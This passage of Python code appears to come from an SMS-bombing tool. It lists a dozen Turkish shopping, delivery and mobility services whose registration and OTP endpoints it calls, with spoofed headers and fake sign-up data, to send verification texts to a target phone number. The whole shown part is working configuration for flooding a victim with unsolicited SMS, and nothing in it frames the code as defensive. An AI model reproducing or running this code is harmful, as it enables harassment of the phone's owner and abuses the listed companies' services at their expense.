            "User-Agent": "HEY!%20Scooter/143 CFNetwork/1335.0.3.2 Darwin/21.6.0",
            "Accept-Language": "tr"
        },
        "success_condition": lambda r: r.json().get("IsSuccess") is True,
    },
    {
        "name": "Kigili",
        "url": "https://www.kigili.com/users/registration/",
        "method": "POST",
        "data_payload": lambda number: {
            "first_name": "Memati",
            "last_name": "Bas",
            "email": f"test{number}@gmail.com",
            "phone": f"0{number}",
            "password": "31ABC..abc31",
            "confirm": "true",
            "kvkk": "true",
            "next": ""
        },
        "success_condition": lambda r: r.status_code == 202,
    },
    {
        "name": "NaosStars",
        "url": "https://shop.naosstars.com/users/register/",
        "method": "POST",
        "data_payload": lambda number: {
            "email": f"test{number}@gmail.com",
            "first_name": "Memati",
            "last_name": "Bas",
            "password": "31ABC..abc31",
            "date_of_birth": "1975-12-31",
            "phone": f"0{number}",
            "gender": "male",
            "kvkk": "true",
            "contact": "true",
            "confirm": "true"
        },
        "success_condition": lambda r: r.status_code == 202,
    },
    {
        "name": "Sok",
        "url": "https://api.ceptesok.com/api/users/sendsms",
        "method": "POST",
        "json_payload": lambda number: {"mobile_number": f"{number}", "token_type": "register_token"},
        "success_condition": lambda r: len(r.json().get("meta", {}).get("messages", {}).get("success", [])) != 0,
    },
    {
        "name": "Tiklagelsin",
        "url": "https://svc.apps.tiklagelsin.com/user/graphql",
        "method": "POST",
        "json_payload": lambda number: {
            "operationName": "GENERATE_OTP",
            "query": "mutation GENERATE_OTP($phone: String, $challenge: String, $deviceUniqueId: String) { generateOtp(phone: $phone, challenge: $challenge, deviceUniqueId: $deviceUniqueId) }",
            "variables": {"challenge": "f2523023-283e-46be-b8db-c08f27d3e21c", "deviceUniqueId": "3D7C1B44-7F5D-44FC-B3F2-A1024B3AF6D3", "phone": f"{number}"}
        },
        "success_condition": lambda r: r.json().get("data", {}).get("generateOtp") is True,
    },
    {
        "name": "Sakasu",
        "url": "https://www.sakasu.com.tr/app/api_register/step1",
        "method": "POST",
        "data_payload": lambda number: {"phone": f"{number}"},
        "success_condition": lambda r: r.json().get("status") == "ok",
    },
    {
        "name": "Rentiva",
        "url": "https://rentiva.com/api/Account/Login",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json, text/plain, */*",
            "Content-Type": "application/json",
            "Origin": "ionic://localhost",
            "Accept-Encoding": "gzip, deflate",
            "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 15_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148",
            "Accept-Language": "tr-TR,tr;q=0.9"
        },
        "json_payload": lambda number: {"appleId": None, "code": "", "email": "", "facebookId": None, "googleId": None, "lastName": "", "name": "", "phone": f"{number}", "type": 1},
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Bineq",
        "url": lambda number: f"https://bineqapi.heymobility.tech/V2//api/User/ActivationCodeRequest?organizationId=9DCA312E-18C8-4DAE-AE65-01FEAD558739&phonenumber={number}",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json, text/plain, */*",
            "Content-Type": "application/json",
            "Accept-Encoding": "gzip, deflate",
            "User-Agent": "HEY!%20Scooter/116 CFNetwork/1335.0.3 Darwin/21.6.0",
            "Accept-Language": "tr"
        },
        "success_condition": lambda r: r.json().get("IsSuccess") is True,
    },
    {
        "name": "Link",
        "url": "https://consumer-auth.linkfleet.de/consumer_auth/register",
        "method": "POST",
        "json_payload": lambda number: {"phone_number": f"+90{number}"},
        "success_condition": lambda r: r.json().get("detail") == "Ok",
    },
    {
        "name": "Lonca",
        "url": "https://www.loncamarket.com/lid/identity/sendconfirmationcode",
        "method": "POST",
        "headers": lambda number: {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json; charset=utf-8",
            "X-Requested-With": "XMLHttpRequest",
            "Origin": "https://www.loncamarket.com",
            "Dnt": "1",
            "Referer": "https://www.loncamarket.com/bayi/basvuru/sozlesme",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers",
            "Connection": "close"
        },
        "json_payload": lambda number: {"Address": f"{number}", "ConfirmationType": 0},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Dgn",
        "url": "https://odeme.dgnonline.com/index.php?route=ajax/smsconfirm&type=send&ajax=1",
        "method": "POST",
        "headers": lambda number: {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "*/*",
            "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Origin": "https://odeme.dgnonline.com",
            "Dnt": "1",
            "Referer": "https://odeme.dgnonline.com/?bd=1",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers"
        },
        "data_payload": lambda number: {"loginIdentityNumber": "00000000000", "loginMobileNumber": f"{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
]

# The success_condition for đơn giản services is default to status_code == 200
for service in SERVICES:
    if "success_condition" not in service:
        service["success_condition"] = lambda r: r.status_code == 200
    if "method" not in service:
        service["method"] = "POST"